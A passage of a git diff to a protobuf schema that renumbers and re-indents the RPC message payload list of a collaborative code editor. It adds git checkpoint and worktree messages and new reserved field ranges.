SynchronizeBuffers synchronize_buffers = 67; - SynchronizeBuffersResponse synchronize_buffers_response = 68; - FormatBuffers format_buffers = 69; - FormatBuffersResponse 
format_buffers_response = 70; - GetCompletions get_completions = 71; - GetCompletionsResponse get_completions_response = 72; - ResolveCompletionDocumentation resolve_completion_documentation = 73; - ResolveCompletionDocumentationResponse resolve_completion_documentation_response = 74; - ApplyCompletionAdditionalEdits apply_completion_additional_edits = 75; - ApplyCompletionAdditionalEditsResponse apply_completion_additional_edits_response = 76; - GetCodeActions get_code_actions = 77; - GetCodeActionsResponse get_code_actions_response = 78; - GetHover get_hover = 79; - GetHoverResponse get_hover_response = 80; - ApplyCodeAction apply_code_action = 81; - ApplyCodeActionResponse apply_code_action_response = 82; - PrepareRename prepare_rename = 83; - PrepareRenameResponse prepare_rename_response = 84; - PerformRename perform_rename = 85; - PerformRenameResponse perform_rename_response = 86; - - UpdateContacts update_contacts = 89; - ShowContacts show_contacts = 91; - - GetUsers get_users = 92; - FuzzySearchUsers fuzzy_search_users = 93; - UsersResponse users_response = 94; - RequestContact request_contact = 95; - RespondToContactRequest respond_to_contact_request = 96; - RemoveContact remove_contact = 97; - - Follow follow = 98; - FollowResponse follow_response = 99; - UpdateFollowers update_followers = 100; - Unfollow unfollow = 101; - UpdateDiffBases update_diff_bases = 104; - - OnTypeFormatting on_type_formatting = 105; - OnTypeFormattingResponse on_type_formatting_response = 106; - - UpdateWorktreeSettings update_worktree_settings = 107; - - InlayHints inlay_hints = 108; - InlayHintsResponse inlay_hints_response = 109; - ResolveInlayHint resolve_inlay_hint = 110; - ResolveInlayHintResponse resolve_inlay_hint_response = 111; - RefreshInlayHints refresh_inlay_hints = 112; - - CreateChannel create_channel = 113; - CreateChannelResponse create_channel_response = 114; - InviteChannelMember invite_channel_member = 115; - RemoveChannelMember remove_channel_member = 116; - 
RespondToChannelInvite respond_to_channel_invite = 117; - UpdateChannels update_channels = 118; - JoinChannel join_channel = 119; - DeleteChannel delete_channel = 120; - GetChannelMembers get_channel_members = 121; - GetChannelMembersResponse get_channel_members_response = 122; - SetChannelMemberRole set_channel_member_role = 123; - RenameChannel rename_channel = 124; - RenameChannelResponse rename_channel_response = 125; - SubscribeToChannels subscribe_to_channels = 207; - - JoinChannelBuffer join_channel_buffer = 126; - JoinChannelBufferResponse join_channel_buffer_response = 127; - UpdateChannelBuffer update_channel_buffer = 128; - LeaveChannelBuffer leave_channel_buffer = 129; - UpdateChannelBufferCollaborators update_channel_buffer_collaborators = 130; - RejoinChannelBuffers rejoin_channel_buffers = 131; - RejoinChannelBuffersResponse rejoin_channel_buffers_response = 132; - AckBufferOperation ack_buffer_operation = 133; - - JoinChannelChat join_channel_chat = 134; - JoinChannelChatResponse join_channel_chat_response = 135; - LeaveChannelChat leave_channel_chat = 136; - SendChannelMessage send_channel_message = 137; - SendChannelMessageResponse send_channel_message_response = 138; - ChannelMessageSent channel_message_sent = 139; - GetChannelMessages get_channel_messages = 140; - GetChannelMessagesResponse get_channel_messages_response = 141; - RemoveChannelMessage remove_channel_message = 142; - AckChannelMessage ack_channel_message = 143; - GetChannelMessagesById get_channel_messages_by_id = 144; - - MoveChannel move_channel = 147; - ReorderChannel reorder_channel = 349; - SetChannelVisibility set_channel_visibility = 148; - - AddNotification add_notification = 149; - GetNotifications get_notifications = 150; - GetNotificationsResponse get_notifications_response = 151; - DeleteNotification delete_notification = 152; - MarkNotificationRead mark_notification_read = 153; - LspExtExpandMacro lsp_ext_expand_macro = 154; - LspExtExpandMacroResponse 
lsp_ext_expand_macro_response = 155; - SetRoomParticipantRole set_room_participant_role = 156; - - UpdateUserChannels update_user_channels = 157; - - GetImplementation get_implementation = 162; - GetImplementationResponse get_implementation_response = 163; - - UpdateChannelMessage update_channel_message = 170; - ChannelMessageUpdate channel_message_update = 171; - - BlameBuffer blame_buffer = 172; - BlameBufferResponse blame_buffer_response = 173; - - UpdateNotification update_notification = 174; - - RestartLanguageServers restart_language_servers = 208; - - RejoinRemoteProjects rejoin_remote_projects = 186; - RejoinRemoteProjectsResponse rejoin_remote_projects_response = 187; - - OpenNewBuffer open_new_buffer = 196; - - TaskContextForLocation task_context_for_location = 203; - TaskContext task_context = 204; - - LinkedEditingRange linked_editing_range = 209; - LinkedEditingRangeResponse linked_editing_range_response = 210; - - AdvertiseContexts advertise_contexts = 211; - OpenContext open_context = 212; - OpenContextResponse open_context_response = 213; - CreateContext create_context = 232; - CreateContextResponse create_context_response = 233; - UpdateContext update_context = 214; - SynchronizeContexts synchronize_contexts = 215; - SynchronizeContextsResponse synchronize_contexts_response = 216; - - GetSignatureHelp get_signature_help = 217; - GetSignatureHelpResponse get_signature_help_response = 218; - - ListRemoteDirectory list_remote_directory = 219; - ListRemoteDirectoryResponse list_remote_directory_response = 220; - AddWorktree add_worktree = 222; - AddWorktreeResponse add_worktree_response = 223; - - LspExtSwitchSourceHeader lsp_ext_switch_source_header = 241; - LspExtSwitchSourceHeaderResponse lsp_ext_switch_source_header_response = 242; - - FindSearchCandidates find_search_candidates = 243; - - CloseBuffer close_buffer = 245; - - ShutdownRemoteServer shutdown_remote_server = 257; - - RemoveWorktree remove_worktree = 258; - - LanguageServerLog 
language_server_log = 260; - - Toast toast = 261; - HideToast hide_toast = 262; - - OpenServerSettings open_server_settings = 263; - - GetPermalinkToLine get_permalink_to_line = 264; - GetPermalinkToLineResponse get_permalink_to_line_response = 265; + uint32 id = 1; + optional uint32 responding_to = 2; + optional PeerId original_sender_id = 3; + optional uint32 ack_id = 266; + + oneof payload { + Hello hello = 4; + Ack ack = 5; + Error error = 6; + Ping ping = 7; + Test test = 8; + EndStream end_stream = 165; + + CreateRoom create_room = 9; + CreateRoomResponse create_room_response = 10; + JoinRoom join_room = 11; + JoinRoomResponse join_room_response = 12; + RejoinRoom rejoin_room = 13; + RejoinRoomResponse rejoin_room_response = 14; + LeaveRoom leave_room = 15; + Call call = 16; + IncomingCall incoming_call = 17; + CallCanceled call_canceled = 18; + CancelCall cancel_call = 19; + DeclineCall decline_call = 20; + UpdateParticipantLocation update_participant_location = 21; + RoomUpdated room_updated = 22; + + ShareProject share_project = 23; + ShareProjectResponse share_project_response = 24; + UnshareProject unshare_project = 25; + JoinProject join_project = 26; + JoinProjectResponse join_project_response = 27; + LeaveProject leave_project = 28; + AddProjectCollaborator add_project_collaborator = 29; + UpdateProjectCollaborator update_project_collaborator = 30; + RemoveProjectCollaborator remove_project_collaborator = 31; + + GetDefinition get_definition = 32; + GetDefinitionResponse get_definition_response = 33; + GetDeclaration get_declaration = 237; + GetDeclarationResponse get_declaration_response = 238; + GetTypeDefinition get_type_definition = 34; + GetTypeDefinitionResponse get_type_definition_response = 35; + + GetReferences get_references = 36; + GetReferencesResponse get_references_response = 37; + GetDocumentHighlights get_document_highlights = 38; + GetDocumentHighlightsResponse get_document_highlights_response = 39; + GetProjectSymbols 
get_project_symbols = 40; + GetProjectSymbolsResponse get_project_symbols_response = 41; + OpenBufferForSymbol open_buffer_for_symbol = 42; + OpenBufferForSymbolResponse open_buffer_for_symbol_response = 43; + + UpdateProject update_project = 44; + UpdateWorktree update_worktree = 45; + + CreateProjectEntry create_project_entry = 46; + RenameProjectEntry rename_project_entry = 47; + CopyProjectEntry copy_project_entry = 48; + DeleteProjectEntry delete_project_entry = 49; + ProjectEntryResponse project_entry_response = 50; + ExpandProjectEntry expand_project_entry = 51; + ExpandProjectEntryResponse expand_project_entry_response = 52; + ExpandAllForProjectEntry expand_all_for_project_entry = 291; + ExpandAllForProjectEntryResponse expand_all_for_project_entry_response = 292; + UpdateDiagnosticSummary update_diagnostic_summary = 53; + StartLanguageServer start_language_server = 54; + UpdateLanguageServer update_language_server = 55; + + OpenBufferById open_buffer_by_id = 56; + OpenBufferByPath open_buffer_by_path = 57; + OpenBufferResponse open_buffer_response = 58; + CreateBufferForPeer create_buffer_for_peer = 59; + UpdateBuffer update_buffer = 60; + UpdateBufferFile update_buffer_file = 61; + SaveBuffer save_buffer = 62; + BufferSaved buffer_saved = 63; + BufferReloaded buffer_reloaded = 64; + ReloadBuffers reload_buffers = 65; + ReloadBuffersResponse reload_buffers_response = 66; + SynchronizeBuffers synchronize_buffers = 67; + SynchronizeBuffersResponse synchronize_buffers_response = 68; + FormatBuffers format_buffers = 69; + FormatBuffersResponse format_buffers_response = 70; + GetCompletions get_completions = 71; + GetCompletionsResponse get_completions_response = 72; + ResolveCompletionDocumentation resolve_completion_documentation = 73; + ResolveCompletionDocumentationResponse resolve_completion_documentation_response = 74; + ApplyCompletionAdditionalEdits apply_completion_additional_edits = 75; + ApplyCompletionAdditionalEditsResponse 
apply_completion_additional_edits_response = 76; + GetCodeActions get_code_actions = 77; + GetCodeActionsResponse get_code_actions_response = 78; + GetHover get_hover = 79; + GetHoverResponse get_hover_response = 80; + ApplyCodeAction apply_code_action = 81; + ApplyCodeActionResponse apply_code_action_response = 82; + PrepareRename prepare_rename = 83; + PrepareRenameResponse prepare_rename_response = 84; + PerformRename perform_rename = 85; + PerformRenameResponse perform_rename_response = 86; + + UpdateContacts update_contacts = 89; + ShowContacts show_contacts = 91; + + GetUsers get_users = 92; + FuzzySearchUsers fuzzy_search_users = 93; + UsersResponse users_response = 94; + RequestContact request_contact = 95; + RespondToContactRequest respond_to_contact_request = 96; + RemoveContact remove_contact = 97; + + Follow follow = 98; + FollowResponse follow_response = 99; + UpdateFollowers update_followers = 100; + Unfollow unfollow = 101; + UpdateDiffBases update_diff_bases = 104; + + OnTypeFormatting on_type_formatting = 105; + OnTypeFormattingResponse on_type_formatting_response = 106; + + UpdateWorktreeSettings update_worktree_settings = 107; + + InlayHints inlay_hints = 108; + InlayHintsResponse inlay_hints_response = 109; + ResolveInlayHint resolve_inlay_hint = 110; + ResolveInlayHintResponse resolve_inlay_hint_response = 111; + RefreshInlayHints refresh_inlay_hints = 112; + + CreateChannel create_channel = 113; + CreateChannelResponse create_channel_response = 114; + InviteChannelMember invite_channel_member = 115; + RemoveChannelMember remove_channel_member = 116; + RespondToChannelInvite respond_to_channel_invite = 117; + UpdateChannels update_channels = 118; + JoinChannel join_channel = 119; + DeleteChannel delete_channel = 120; + GetChannelMembers get_channel_members = 121; + GetChannelMembersResponse get_channel_members_response = 122; + SetChannelMemberRole set_channel_member_role = 123; + RenameChannel rename_channel = 124; + RenameChannelResponse 
rename_channel_response = 125; + SubscribeToChannels subscribe_to_channels = 207; + + JoinChannelBuffer join_channel_buffer = 126; + JoinChannelBufferResponse join_channel_buffer_response = 127; + UpdateChannelBuffer update_channel_buffer = 128; + LeaveChannelBuffer leave_channel_buffer = 129; + UpdateChannelBufferCollaborators update_channel_buffer_collaborators = 130; + RejoinChannelBuffers rejoin_channel_buffers = 131; + RejoinChannelBuffersResponse rejoin_channel_buffers_response = 132; + AckBufferOperation ack_buffer_operation = 133; + + JoinChannelChat join_channel_chat = 134; + JoinChannelChatResponse join_channel_chat_response = 135; + LeaveChannelChat leave_channel_chat = 136; + SendChannelMessage send_channel_message = 137; + SendChannelMessageResponse send_channel_message_response = 138; + ChannelMessageSent channel_message_sent = 139; + GetChannelMessages get_channel_messages = 140; + GetChannelMessagesResponse get_channel_messages_response = 141; + RemoveChannelMessage remove_channel_message = 142; + AckChannelMessage ack_channel_message = 143; + GetChannelMessagesById get_channel_messages_by_id = 144; + + MoveChannel move_channel = 147; + ReorderChannel reorder_channel = 349; + SetChannelVisibility set_channel_visibility = 148; + + AddNotification add_notification = 149; + GetNotifications get_notifications = 150; + GetNotificationsResponse get_notifications_response = 151; + DeleteNotification delete_notification = 152; + MarkNotificationRead mark_notification_read = 153; + LspExtExpandMacro lsp_ext_expand_macro = 154; + LspExtExpandMacroResponse lsp_ext_expand_macro_response = 155; + SetRoomParticipantRole set_room_participant_role = 156; + + UpdateUserChannels update_user_channels = 157; + + GetImplementation get_implementation = 162; + GetImplementationResponse get_implementation_response = 163; + + UpdateChannelMessage update_channel_message = 170; + ChannelMessageUpdate channel_message_update = 171; + + BlameBuffer blame_buffer = 172; + 
BlameBufferResponse blame_buffer_response = 173; - FlushBufferedMessages flush_buffered_messages = 267; + UpdateNotification update_notification = 174; - LanguageServerPromptRequest language_server_prompt_request = 268; - LanguageServerPromptResponse language_server_prompt_response = 269; + RestartLanguageServers restart_language_servers = 208; - GitBranchesResponse git_branches_response = 271; + RejoinRemoteProjects rejoin_remote_projects = 186; + RejoinRemoteProjectsResponse rejoin_remote_projects_response = 187; - UpdateGitBranch update_git_branch = 272; + OpenNewBuffer open_new_buffer = 196; - ListToolchains list_toolchains = 273; - ListToolchainsResponse list_toolchains_response = 274; - ActivateToolchain activate_toolchain = 275; - ActiveToolchain active_toolchain = 276; - ActiveToolchainResponse active_toolchain_response = 277; + TaskContextForLocation task_context_for_location = 203; + TaskContext task_context = 204; - GetPathMetadata get_path_metadata = 278; - GetPathMetadataResponse get_path_metadata_response = 279; + LinkedEditingRange linked_editing_range = 209; + LinkedEditingRangeResponse linked_editing_range_response = 210; - CancelLanguageServerWork cancel_language_server_work = 282; + GetSignatureHelp get_signature_help = 217; + GetSignatureHelpResponse get_signature_help_response = 218; - LspExtOpenDocs lsp_ext_open_docs = 283; - LspExtOpenDocsResponse lsp_ext_open_docs_response = 284; + ListRemoteDirectory list_remote_directory = 219; + ListRemoteDirectoryResponse list_remote_directory_response = 220; + AddWorktree add_worktree = 222; + AddWorktreeResponse add_worktree_response = 223; - SyncExtensions sync_extensions = 285; - SyncExtensionsResponse sync_extensions_response = 286; - InstallExtension install_extension = 287; + LspExtSwitchSourceHeader lsp_ext_switch_source_header = 241; + LspExtSwitchSourceHeaderResponse lsp_ext_switch_source_header_response = 242; - OpenUnstagedDiff open_unstaged_diff = 288; - OpenUnstagedDiffResponse 
open_unstaged_diff_response = 289; + FindSearchCandidates find_search_candidates = 243; - RegisterBufferWithLanguageServers register_buffer_with_language_servers = 290; + CloseBuffer close_buffer = 245; - Stage stage = 293; - Unstage unstage = 294; - Commit commit = 295; - OpenCommitMessageBuffer open_commit_message_buffer = 296; + ShutdownRemoteServer shutdown_remote_server = 257; - OpenUncommittedDiff open_uncommitted_diff = 297; - OpenUncommittedDiffResponse open_uncommitted_diff_response = 298; + RemoveWorktree remove_worktree = 258; - SetIndexText set_index_text = 299; + LanguageServerLog language_server_log = 260; - GitShow git_show = 300; - GitReset git_reset = 301; - GitCommitDetails git_commit_details = 302; - GitCheckoutFiles git_checkout_files = 303; + Toast toast = 261; + HideToast hide_toast = 262; - Push push = 304; - Fetch fetch = 305; - GetRemotes get_remotes = 306; - GetRemotesResponse get_remotes_response = 307; - Pull pull = 308; + OpenServerSettings open_server_settings = 263; - ApplyCodeActionKind apply_code_action_kind = 309; - ApplyCodeActionKindResponse apply_code_action_kind_response = 310; + GetPermalinkToLine get_permalink_to_line = 264; + GetPermalinkToLineResponse get_permalink_to_line_response = 265; - RemoteMessageResponse remote_message_response = 311; + FlushBufferedMessages flush_buffered_messages = 267; - GitGetBranches git_get_branches = 312; - GitCreateBranch git_create_branch = 313; - GitChangeBranch git_change_branch = 314; + LanguageServerPromptRequest language_server_prompt_request = 268; + LanguageServerPromptResponse language_server_prompt_response = 269; - CheckForPushedCommits check_for_pushed_commits = 315; - CheckForPushedCommitsResponse check_for_pushed_commits_response = 316; + GitBranchesResponse git_branches_response = 271; - AskPassRequest ask_pass_request = 317; - AskPassResponse ask_pass_response = 318; + UpdateGitBranch update_git_branch = 272; - GitDiff git_diff = 319; - GitDiffResponse git_diff_response = 
320; - GitInit git_init = 321; + ListToolchains list_toolchains = 273; + ListToolchainsResponse list_toolchains_response = 274; + ActivateToolchain activate_toolchain = 275; + ActiveToolchain active_toolchain = 276; + ActiveToolchainResponse active_toolchain_response = 277; - CodeLens code_lens = 322; - GetCodeLens get_code_lens = 323; - GetCodeLensResponse get_code_lens_response = 324; - RefreshCodeLens refresh_code_lens = 325; + GetPathMetadata get_path_metadata = 278; + GetPathMetadataResponse get_path_metadata_response = 279; - ToggleBreakpoint toggle_breakpoint = 326; - BreakpointsForFile breakpoints_for_file = 327; + CancelLanguageServerWork cancel_language_server_work = 282; - UpdateRepository update_repository = 328; - RemoveRepository remove_repository = 329; + LspExtOpenDocs lsp_ext_open_docs = 283; + LspExtOpenDocsResponse lsp_ext_open_docs_response = 284; - GetDocumentSymbols get_document_symbols = 330; - GetDocumentSymbolsResponse get_document_symbols_response = 331; + SyncExtensions sync_extensions = 285; + SyncExtensionsResponse sync_extensions_response = 286; + InstallExtension install_extension = 287; - LoadCommitDiff load_commit_diff = 334; - LoadCommitDiffResponse load_commit_diff_response = 335; + OpenUnstagedDiff open_unstaged_diff = 288; + OpenUnstagedDiffResponse open_unstaged_diff_response = 289; - StopLanguageServers stop_language_servers = 336; + RegisterBufferWithLanguageServers register_buffer_with_language_servers = 290; - LspExtRunnables lsp_ext_runnables = 337; - LspExtRunnablesResponse lsp_ext_runnables_response = 338; + Stage stage = 293; + Unstage unstage = 294; + Commit commit = 295; + OpenCommitMessageBuffer open_commit_message_buffer = 296; - GetDebugAdapterBinary get_debug_adapter_binary = 339; - DebugAdapterBinary debug_adapter_binary = 340; - RunDebugLocators run_debug_locators = 341; - DebugRequest debug_request = 342; + OpenUncommittedDiff open_uncommitted_diff = 297; + OpenUncommittedDiffResponse 
open_uncommitted_diff_response = 298; - LspExtGoToParentModule lsp_ext_go_to_parent_module = 343; - LspExtGoToParentModuleResponse lsp_ext_go_to_parent_module_response = 344; - LspExtCancelFlycheck lsp_ext_cancel_flycheck = 345; - LspExtRunFlycheck lsp_ext_run_flycheck = 346; - LspExtClearFlycheck lsp_ext_clear_flycheck = 347; + SetIndexText set_index_text = 299; - LogToDebugConsole log_to_debug_console = 348; + GitShow git_show = 300; + GitReset git_reset = 301; + GitCommitDetails git_commit_details = 302; + GitCheckoutFiles git_checkout_files = 303; - GetDocumentDiagnostics get_document_diagnostics = 350; - GetDocumentDiagnosticsResponse get_document_diagnostics_response = 351; - PullWorkspaceDiagnostics pull_workspace_diagnostics = 352; + Push push = 304; + Fetch fetch = 305; + GetRemotes get_remotes = 306; + GetRemotesResponse get_remotes_response = 307; + Pull pull = 308; - GetDocumentColor get_document_color = 353; - GetDocumentColorResponse get_document_color_response = 354; - GetColorPresentation get_color_presentation = 355; - GetColorPresentationResponse get_color_presentation_response = 356; + ApplyCodeActionKind apply_code_action_kind = 309; + ApplyCodeActionKindResponse apply_code_action_kind_response = 310; - Stash stash = 357; - StashPop stash_pop = 358; + RemoteMessageResponse remote_message_response = 311; - GetDefaultBranch get_default_branch = 359; - GetDefaultBranchResponse get_default_branch_response = 360; + GitGetBranches git_get_branches = 312; + GitCreateBranch git_create_branch = 313; + GitChangeBranch git_change_branch = 314; - GetCrashFiles get_crash_files = 361; - GetCrashFilesResponse get_crash_files_response = 362; + CheckForPushedCommits check_for_pushed_commits = 315; + CheckForPushedCommitsResponse check_for_pushed_commits_response = 316; - GitClone git_clone = 363; - GitCloneResponse git_clone_response = 364; + AskPassRequest ask_pass_request = 317; + AskPassResponse ask_pass_response = 318; - LspQuery lsp_query = 365; - 
LspQueryResponse lsp_query_response = 366; - ToggleLspLogs toggle_lsp_logs = 367; + GitDiff git_diff = 319; + GitDiffResponse git_diff_response = 320; + GitInit git_init = 321; - UpdateUserSettings update_user_settings = 368; + CodeLens code_lens = 322; + GetCodeLens get_code_lens = 323; + GetCodeLensResponse get_code_lens_response = 324; + RefreshCodeLens refresh_code_lens = 325; - GetProcesses get_processes = 369; - GetProcessesResponse get_processes_response = 370; + ToggleBreakpoint toggle_breakpoint = 326; + BreakpointsForFile breakpoints_for_file = 327; - ResolveToolchain resolve_toolchain = 371; - ResolveToolchainResponse resolve_toolchain_response = 372; + UpdateRepository update_repository = 328; + RemoveRepository remove_repository = 329; - GetAgentServerCommand get_agent_server_command = 373; - AgentServerCommand agent_server_command = 374; + GetDocumentSymbols get_document_symbols = 330; + GetDocumentSymbolsResponse get_document_symbols_response = 331; - ExternalAgentsUpdated external_agents_updated = 375; - ExternalAgentLoadingStatusUpdated external_agent_loading_status_updated = 376; - NewExternalAgentVersionAvailable new_external_agent_version_available = 377; + LoadCommitDiff load_commit_diff = 334; + LoadCommitDiffResponse load_commit_diff_response = 335; - StashDrop stash_drop = 378; - StashApply stash_apply = 379; + StopLanguageServers stop_language_servers = 336; - GitRenameBranch git_rename_branch = 380; + LspExtRunnables lsp_ext_runnables = 337; + LspExtRunnablesResponse lsp_ext_runnables_response = 338; - RemoteStarted remote_started = 381; + GetDebugAdapterBinary get_debug_adapter_binary = 339; + DebugAdapterBinary debug_adapter_binary = 340; + RunDebugLocators run_debug_locators = 341; + DebugRequest debug_request = 342; - GetDirectoryEnvironment get_directory_environment = 382; - DirectoryEnvironment directory_environment = 383; + LspExtGoToParentModule lsp_ext_go_to_parent_module = 343; + LspExtGoToParentModuleResponse 
lsp_ext_go_to_parent_module_response = 344; + LspExtCancelFlycheck lsp_ext_cancel_flycheck = 345; + LspExtRunFlycheck lsp_ext_run_flycheck = 346; + LspExtClearFlycheck lsp_ext_clear_flycheck = 347; - GetTreeDiff get_tree_diff = 384; - GetTreeDiffResponse get_tree_diff_response = 385; + LogToDebugConsole log_to_debug_console = 348; - GetBlobContent get_blob_content = 386; - GetBlobContentResponse get_blob_content_response = 387; + GetDocumentDiagnostics get_document_diagnostics = 350; + GetDocumentDiagnosticsResponse get_document_diagnostics_response = 351; + PullWorkspaceDiagnostics pull_workspace_diagnostics = 352; - GitWorktreesResponse git_worktrees_response = 388; - GitGetWorktrees git_get_worktrees = 389; - GitCreateWorktree git_create_worktree = 390; + GetDocumentColor get_document_color = 353; + GetDocumentColorResponse get_document_color_response = 354; + GetColorPresentation get_color_presentation = 355; + GetColorPresentationResponse get_color_presentation_response = 356; - OpenImageByPath open_image_by_path = 391; - OpenImageResponse open_image_response = 392; - CreateImageForPeer create_image_for_peer = 393; + Stash stash = 357; + StashPop stash_pop = 358; + GetDefaultBranch get_default_branch = 359; + GetDefaultBranchResponse get_default_branch_response = 360; - GitFileHistory git_file_history = 397; - GitFileHistoryResponse git_file_history_response = 398; + GetCrashFiles get_crash_files = 361; + GetCrashFilesResponse get_crash_files_response = 362; - RunGitHook run_git_hook = 399; + GitClone git_clone = 363; + GitCloneResponse git_clone_response = 364; - GitDeleteBranch git_delete_branch = 400; + LspQuery lsp_query = 365; + LspQueryResponse lsp_query_response = 366; + ToggleLspLogs toggle_lsp_logs = 367; - ExternalExtensionAgentsUpdated external_extension_agents_updated = 401; + UpdateUserSettings update_user_settings = 368; - GitCreateRemote git_create_remote = 402; - GitRemoveRemote git_remove_remote = 403; + GetProcesses get_processes = 369; + 
GetProcessesResponse get_processes_response = 370; - TrustWorktrees trust_worktrees = 404; - RestrictWorktrees restrict_worktrees = 405; + ResolveToolchain resolve_toolchain = 371; + ResolveToolchainResponse resolve_toolchain_response = 372; - ShareAgentThread share_agent_thread = 406; - GetSharedAgentThread get_shared_agent_thread = 407; - GetSharedAgentThreadResponse get_shared_agent_thread_response = 408; + GetAgentServerCommand get_agent_server_command = 373; + AgentServerCommand agent_server_command = 374; - FindSearchCandidatesChunk find_search_candidates_chunk = 409; - FindSearchCandidatesCancelled find_search_candidates_cancelled = 410; - GetContextServerCommand get_context_server_command = 411; - ContextServerCommand context_server_command = 412; + ExternalAgentsUpdated external_agents_updated = 375; + ExternalAgentLoadingStatusUpdated external_agent_loading_status_updated = 376; + NewExternalAgentVersionAvailable new_external_agent_version_available = 377; - AllocateWorktreeId allocate_worktree_id = 413; - AllocateWorktreeIdResponse allocate_worktree_id_response = 414; + StashDrop stash_drop = 378; + StashApply stash_apply = 379; - DownloadFileByPath download_file_by_path = 415; - DownloadFileResponse download_file_response = 416; - CreateFileForPeer create_file_for_peer = 417; + GitRenameBranch git_rename_branch = 380; - SemanticTokens semantic_tokens = 418; - SemanticTokensResponse semantic_tokens_response = 419; - RefreshSemanticTokens refresh_semantic_tokens = 420; - GetFoldingRanges get_folding_ranges = 421; - GetFoldingRangesResponse get_folding_ranges_response = 422; + RemoteStarted remote_started = 381; - GetRemoteProfilingData get_remote_profiling_data = 423; - GetRemoteProfilingDataResponse get_remote_profiling_data_response = 424; - - SpawnKernel spawn_kernel = 426; - SpawnKernelResponse spawn_kernel_response = 427; - KillKernel kill_kernel = 428; - GitDiffStat git_diff_stat = 429; - GitDiffStatResponse git_diff_stat_response = 430; // current 
max - } + GetDirectoryEnvironment get_directory_environment = 382; + DirectoryEnvironment directory_environment = 383; - reserved 87 to 88; - reserved 90; - reserved 102 to 103; - reserved 158 to 161; - reserved 164; - reserved 166 to 169; - reserved 175 to 185; - reserved 188 to 195; - reserved 197; - reserved 198 to 202; - reserved 205 to 206; - reserved 221; - reserved 224 to 231; - reserved 234 to 236; - reserved 239 to 240; - reserved 244; - reserved 246 to 256; - reserved 259; - reserved 270; - reserved 280 to 281; - reserved 332 to 333; - reserved 394 to 396; + GetTreeDiff get_tree_diff = 384; + GetTreeDiffResponse get_tree_diff_response = 385; + + GetBlobContent get_blob_content = 386; + GetBlobContentResponse get_blob_content_response = 387; + + GitWorktreesResponse git_worktrees_response = 388; + GitGetWorktrees git_get_worktrees = 389; + GitCreateWorktree git_create_worktree = 390; + + OpenImageByPath open_image_by_path = 391; + OpenImageResponse open_image_response = 392; + CreateImageForPeer create_image_for_peer = 393; + + GitFileHistory git_file_history = 397; + GitFileHistoryResponse git_file_history_response = 398; + + RunGitHook run_git_hook = 399; + + GitDeleteBranch git_delete_branch = 400; + + ExternalExtensionAgentsUpdated external_extension_agents_updated = 401; + + GitCreateRemote git_create_remote = 402; + GitRemoveRemote git_remove_remote = 403; + + TrustWorktrees trust_worktrees = 404; + RestrictWorktrees restrict_worktrees = 405; + + ShareAgentThread share_agent_thread = 406; + GetSharedAgentThread get_shared_agent_thread = 407; + GetSharedAgentThreadResponse get_shared_agent_thread_response = 408; + + FindSearchCandidatesChunk find_search_candidates_chunk = 409; + FindSearchCandidatesCancelled find_search_candidates_cancelled = 410; + GetContextServerCommand get_context_server_command = 411; + ContextServerCommand context_server_command = 412; + + AllocateWorktreeId allocate_worktree_id = 413; + AllocateWorktreeIdResponse 
allocate_worktree_id_response = 414; + + DownloadFileByPath download_file_by_path = 415; + DownloadFileResponse download_file_response = 416; + CreateFileForPeer create_file_for_peer = 417; + + SemanticTokens semantic_tokens = 418; + SemanticTokensResponse semantic_tokens_response = 419; + RefreshSemanticTokens refresh_semantic_tokens = 420; + GetFoldingRanges get_folding_ranges = 421; + GetFoldingRangesResponse get_folding_ranges_response = 422; + + GetRemoteProfilingData get_remote_profiling_data = 423; + GetRemoteProfilingDataResponse get_remote_profiling_data_response = 424; + + SpawnKernel spawn_kernel = 426; + SpawnKernelResponse spawn_kernel_response = 427; + KillKernel kill_kernel = 428; + GitRemoveWorktree git_remove_worktree = 431; + GitRenameWorktree git_rename_worktree = 432; + GitCreateCheckpoint git_create_checkpoint = 433; + GitCreateCheckpointResponse git_create_checkpoint_response = 434; + GitRestoreCheckpoint git_restore_checkpoint = 435; + GitCompareCheckpoints git_compare_checkpoints = 436; + GitCompareCheckpointsResponse git_compare_checkpoints_response = 437; + GitDiffCheckpoints git_diff_checkpoints = 438; + GitDiffCheckpointsResponse git_diff_checkpoints_response = 439; + GitGetHeadSha git_get_head_sha = 440; + GitGetHeadShaResponse git_get_head_sha_response = 441; // current max + } + + reserved 87 to 88; + reserved 90; + reserved 102 to 103; + reserved 158 to 161; + reserved 164; + reserved 166 to 169; + reserved 175 to 185; + reserved 188 to 195; + reserved 197; + reserved 198 to 202; + reserved 205 to 206; + reserved 221; + reserved 224 to 231; + reserved 234 to 236; + reserved 239 to 240; + reserved 244; + reserved 246 to 256; + reserved 259; + reserved 270; + reserved 280 to 281; + reserved 332 to 333; + reserved 394 to 396; + reserved 429 to 430; + reserved 211 to 216, 232 to 233; } message Hello { - PeerId peer_id = 1; + PeerId peer_id = 1; } message Ping {} @@ -514,37 +514,37 @@ message Ping {} message Ack {} message Error { - 
string message = 1; - ErrorCode code = 2; - repeated string tags = 3; + string message = 1; + ErrorCode code = 2; + repeated string tags = 3; } enum ErrorCode { - Internal = 0; - NoSuchChannel = 1; - Disconnected = 2; - SignedOut = 3; - UpgradeRequired = 4; - Forbidden = 5; - NeedsCla = 7; - NotARootChannel = 8; - BadPublicNesting = 9; - CircularNesting = 10; - WrongMoveTarget = 11; - UnsharedItem = 12; - NoSuchProject = 13; - DevServerProjectPathDoesNotExist = 16; - RemoteUpgradeRequired = 17; - RateLimitExceeded = 18; - CommitFailed = 19; - reserved 6; - reserved 14 to 15; + Internal = 0; + NoSuchChannel = 1; + Disconnected = 2; + SignedOut = 3; + UpgradeRequired = 4; + Forbidden = 5; + NeedsCla = 7; + NotARootChannel = 8; + BadPublicNesting = 9; + CircularNesting = 10; + WrongMoveTarget = 11; + UnsharedItem = 12; + NoSuchProject = 13; + DevServerProjectPathDoesNotExist = 16; + RemoteUpgradeRequired = 17; + RateLimitExceeded = 18; + CommitFailed = 19; + reserved 6; + reserved 14 to 15; } message EndStream {} message Test { - uint64 id = 1; + uint64 id = 1; } message FlushBufferedMessages {} @@ -554,19 +554,19 @@ message FlushBufferedMessagesResponse {} message RemoteStarted {} message SpawnKernel { - string kernel_name = 1; - string working_directory = 2; - uint64 project_id = 3; - string command = 4; - repeated string args = 5; + string kernel_name = 1; + string working_directory = 2; + uint64 project_id = 3; + string command = 4; + repeated string args = 5; } message SpawnKernelResponse { - string kernel_id = 1; - string connection_file = 2; + string kernel_id = 1; + string connection_file = 2; } message KillKernel { - string kernel_id = 1; - uint64 project_id = 2; + string kernel_id = 1; + uint64 project_id = 2; } diff --git a/crates/proto/src/error.rs 